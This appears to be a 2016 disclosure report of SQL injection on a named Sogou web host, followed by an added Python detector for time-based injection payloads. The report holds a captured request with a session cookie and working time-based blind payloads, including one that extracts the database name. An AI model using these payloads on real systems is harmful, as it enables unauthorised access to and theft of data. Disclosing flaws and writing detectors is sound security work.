SQL injection in a Sogou site
July 14, 2016
Original text
POST /index.php/index/logout?s=/Index/login HTTP/1.1
Content-Length: 186
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://union.app.sogou.com/
Cookie: PHPSESSID=c5jcj8ga3ggjuebsfdgk7p7bh3
Host: union.app.sogou.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password=Passw0ad_a&product=A&username=kksjewpc
---
Parameter: product (POST)
    Type: error-based
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: password=Passw0ad_a&product=Uxsv'XOR(if(now()=sysdate(),sleep(5),0) )OR'Uxsv&username=kksjewpc

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: password=Passw0ad_a&product=A AND (SELECT * FROM (SELECT(SLEEP(5))) NMiA)&username=kksjewpc
---
web application technology: PHP 5.5.6
back-end DBMS: MySQL 5.0.12

Retrieving the database name:

http://union.app.sogou.com:80/index.php/index/logout?s=/Index/login

password=Passw0ad_a&product=Uxsv'XOR(if(1=1,sleep(mid(database(),1,1)='a'),0))OR'Uxsv&username=kksjewpc

database: app
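A defender-side check, added here as an example and not part of the original report: it URL-decodes a form body and flags fields whose value combines a MySQL delay call with SQL syntax, run against the request bodies shown above. The function names and regular expressions are assumptions chosen for illustration.

```python
import re
from urllib.parse import parse_qsl

# MySQL calls that introduce a delay; they are what make the payloads
# in this report "time-based".
DELAY_CALL = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# SQL syntax that has no place in a plain form value such as product=A.
SQL_SYNTAX = re.compile(r"'|\b(select|xor|and|or|if)\b", re.IGNORECASE)

# Request bodies copied from the report, plus two constructed benign ones.
SAMPLES = {
    "original": "password=Passw0ad_a&product=A&username=kksjewpc",
    "xor_sleep": "password=Passw0ad_a&product=Uxsv'XOR(if(now()=sysdate(),"
                 "sleep(5),0) )OR'Uxsv&username=kksjewpc",
    "and_sleep": "password=Passw0ad_a&product=A AND (SELECT * FROM "
                 "(SELECT(SLEEP(5))) NMiA)&username=kksjewpc",
    "extract": "password=Passw0ad_a&product=Uxsv'XOR(if(1=1,sleep(mid("
               "database(),1,1)='a'),0))OR'Uxsv&username=kksjewpc",
    # Constructed: the word "sleep" with no call and no SQL syntax.
    "benign_word": "password=x&product=sleep+tracker&username=kksjewpc",
    # Constructed: an apostrophe alone must not be flagged.
    "benign_quote": "password=x&product=A&username=o'brien",
}


def flag_time_based_sqli(body: str) -> list[str]:
    """Return the form fields whose decoded value looks like a timing probe."""
    flagged = []
    # parse_qsl percent-decodes, so %27 and '+' are normalised before matching.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if DELAY_CALL.search(value) and SQL_SYNTAX.search(value):
            flagged.append(name)
    return flagged


def scan(samples: dict[str, str]) -> dict[str, list[str]]:
    """Run the check over labelled request bodies."""
    return {label: flag_time_based_sqli(body) for label, body in samples.items()}


if __name__ == "__main__":
    for label, fields in scan(SAMPLES).items():
        print(f"{label:13} -> {fields or 'clean'}")
```

A match is a triage signal for logs or a WAF rule, not the fix; the fix is to bind `product` as a query parameter on the server side.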